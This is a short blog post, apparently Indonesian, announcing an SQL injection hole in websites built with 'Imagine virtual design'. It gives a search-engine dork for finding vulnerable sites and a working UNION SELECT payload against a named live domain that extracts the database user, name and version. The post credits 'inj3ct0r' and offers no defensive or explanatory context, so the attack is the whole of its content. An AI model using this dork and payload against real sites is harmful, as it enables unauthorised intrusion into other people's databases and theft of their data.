Bug SQL Injection di "Imagine virtual design"

0 Comments »
[ type attack ]
SQL Injection

[ dork ]
intext:"Design by imagine virtual" inurl:".php?id="

[ demo ]
http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

[ details ]
inj3ct0r 

0 Responses to "Bug SQL Injection di "Imagine virtual design""

Posting Komentar